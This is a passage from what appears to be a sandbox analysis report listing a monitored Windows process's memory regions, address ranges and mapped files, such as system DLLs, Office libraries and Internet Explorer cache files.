pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 2506 start_va = 0x340000 end_va = 0x356fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 2507 start_va = 0x360000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2508 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2509 start_va = 0x470000 end_va = 0x47cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 2510 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2511 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2512 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2513 start_va = 0x720000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2514 start_va = 0x8b0000 end_va = 0x1caffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2515 start_va = 0x1cb0000 end_va = 0x1f7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2516 start_va = 0x1f80000 end_va = 0x1f81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 2517 start_va = 0x1f90000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 2518 start_va = 0x1fa0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2519 start_va = 0x1fe0000 end_va = 0x20befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 2520 start_va = 0x20c0000 end_va = 0x212dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 2521 start_va = 0x2130000 end_va = 0x21a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 2522 start_va = 0x21b0000 end_va = 0x21b7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 2523 start_va = 0x21c0000 end_va = 0x21c7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2524 start_va = 0x21d0000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2525 start_va = 0x2210000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2526 start_va = 0x2250000 end_va = 0x2250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002250000" filename = "" Region: id = 2527 start_va = 0x22a0000 end_va = 0x22a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 2528 start_va = 0x22b0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 2529 start_va = 0x22f0000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 2530 start_va = 0x2310000 end_va = 0x2311fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 2531 start_va = 0x2320000 end_va = 0x2321fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 2532 start_va = 0x2330000 end_va = 0x2330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 2533 start_va = 0x2340000 end_va = 0x2347fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\feeds cache\\index.dat") Region: id = 2534 start_va = 0x2350000 end_va = 0x2361fff monitored = 0 entry_point = 0x2356b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 2535 start_va = 0x2370000 end_va = 0x2370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 2536 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2537 start_va = 0x2390000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 2538 start_va = 0x23d0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 2539 start_va = 0x24d0000 end_va = 0x24d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 2540 start_va = 0x24e0000 end_va = 0x24e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 2541 start_va = 0x24f0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 2542 start_va = 0x2530000 end_va = 0x2537fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 2543 start_va = 0x2540000 end_va = 0x2540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002540000" filename = "" Region: id = 2544 start_va = 0x2590000 end_va = 0x2590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2545 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2546 start_va = 0x25b0000 end_va = 0x25b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2547 start_va = 0x25c0000 end_va = 0x25c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshtml.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshtml.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshtml.dll.mui") Region: id = 2548 start_va = 0x25d0000 end_va = 0x25d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mlang.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mlang.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mlang.dll.mui") Region: id = 2549 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2550 start_va = 0x2700000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2551 start_va = 0x2750000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 2552 start_va = 0x2870000 end_va = 0x28affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 2553 start_va = 0x28b0000 end_va = 0x29affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 2554 start_va = 0x29c0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 2555 start_va = 0x2bc0000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 2556 start_va = 0x2cc0000 end_va = 0x2d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 2557 start_va = 0x2ec0000 end_va = 0x2fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 2558 start_va = 0x30c0000 end_va = 0x31effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 2559 start_va = 0x3280000 end_va = 0x32bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2560 start_va = 0x32c0000 end_va = 0x3beffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2561 start_va = 0x3c70000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 2562 start_va = 0x3d60000 end_va = 0x3e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 2563 start_va = 0x3e60000 end_va = 0x4823fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e60000" filename = "" Region: id = 2564 start_va = 0x5fff0000 end_va = 0x5fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 2565 start_va = 0x72cd0000 end_va = 0x72cdafff monitored = 0 entry_point = 0x72cd12c6 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 2566 start_va = 0x72ce0000 end_va = 0x72d3efff monitored = 0 entry_point = 0x72ce2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2567 start_va = 0x72d40000 end_va = 0x72ef8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 2568 start_va = 0x72f00000 end_va = 0x7313ffff monitored = 0 entry_point = 0x72f066bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 2569 start_va = 0x73140000 end_va = 0x732b2fff monitored = 0 entry_point = 0x73141000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\grooveex.dll") Region: id = 2570 start_va = 0x732c0000 end_va = 0x732d6fff monitored = 0 entry_point = 0x732cd36d region_type = mapped_file name = "msohev.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msohev.dll") Region: id = 2571 start_va = 0x732e0000 end_va = 0x73344fff monitored = 0 entry_point = 0x732e7d63 region_type = mapped_file name = "urlredir.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\URLREDIR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\urlredir.dll") Region: id = 2572 start_va = 0x73350000 end_va = 0x73352fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ochelperresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\OcHelperResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\ochelperresource.dll") Region: id = 2573 start_va = 0x73360000 end_va = 0x73362fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 2574 start_va = 0x73370000 end_va = 0x73372fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 2575 start_va = 0x73380000 end_va = 0x73382fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 2576 start_va = 0x73390000 end_va = 0x73392fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 2577 start_va = 0x733a0000 end_va = 0x733a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 2578 start_va = 0x733b0000 end_va = 0x733b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 2579 start_va = 0x733c0000 end_va = 0x733c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 2580 start_va = 0x733d0000 end_va = 0x733d3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 2581 start_va = 0x733e0000 end_va = 0x733e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 2582 start_va = 0x733f0000 end_va = 0x733f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 2583 start_va = 0x73400000 end_va = 0x73403fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 2584 start_va = 0x73410000 end_va = 0x73412fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-file-l1-2-0.dll") Region: id = 2585 start_va = 0x73420000 end_va = 0x73422fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 2586 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2587 start_va = 0x73440000 end_va = 0x73442fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 2588 start_va = 0x73450000 end_va = 0x73452fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-file-l2-1-0.dll") Region: id = 2589 start_va = 0x73460000 end_va = 0x73462fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 2590 start_va = 0x73470000 end_va = 0x7354bfff monitored = 0 entry_point = 0x7349c130 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 2591 start_va = 0x73550000 end_va = 0x73564fff monitored = 0 entry_point = 0x7355b1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 2592 start_va = 0x73570000 end_va = 0x735dcfff monitored = 0 entry_point = 0x735aab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 2593 start_va = 0x735e0000 end_va = 0x7361bfff monitored = 0 entry_point = 0x735f8177 region_type = mapped_file name = "ochelper.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OCHelper.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\ochelper.dll") Region: id = 2594 start_va = 0x73620000 end_va = 0x7364dfff monitored = 0 entry_point = 0x736216ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 2595 start_va = 0x73650000 end_va = 0x73684fff monitored = 0 entry_point = 0x73674cdc region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll") Region: id = 2596 start_va = 0x73730000 end_va = 0x73759fff monitored = 0 entry_point = 0x737310ed region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 2597 start_va = 0x73760000 end_va = 0x73d16fff monitored = 0 entry_point = 0x7376bffb region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 2598 start_va = 0x73f80000 end_va = 0x74074fff monitored = 0 entry_point = 0x73f90d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2599 start_va = 0x74090000 end_va = 0x74093fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 2600 start_va = 0x740d0000 end_va = 0x7411bfff monitored = 0 entry_point = 0x740d2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2601 start_va = 0x74120000 end_va = 0x7414afff monitored = 0 entry_point = 0x7413d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 2602 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2603 start_va = 0x74190000 end_va = 0x741a6fff monitored = 0 entry_point = 0x74193573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2604 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2605 start_va = 0x742c0000 end_va = 0x742cdfff monitored = 0 entry_point = 0x742c1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2606 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2607 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2608 start_va = 0x74410000 end_va = 0x74416fff monitored = 0 entry_point = 0x7441128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2609 start_va = 0x74420000 end_va = 0x7443bfff monitored = 0 entry_point = 0x7442a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2610 start_va = 0x74440000 end_va = 0x74483fff monitored = 0 entry_point = 0x744563f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2611 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2612 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2613 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2614 start_va = 0x74670000 end_va = 0x746abfff monitored = 0 entry_point = 0x74673089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 2615 start_va = 0x746b0000 end_va = 0x7512ffff monitored = 0 entry_point = 0x746b6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 2616 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2617 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2618 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2619 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2620 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2621 start_va = 0x75470000 end_va = 0x755a5fff monitored = 0 entry_point = 0x75471b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2622 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2623 start_va = 0x76200000 end_va = 0x76234fff monitored = 0 entry_point = 0x7620145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2624 start_va = 0x76240000 end_va = 0x76266fff monitored = 0 entry_point = 0x762458b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2625 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2626 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: 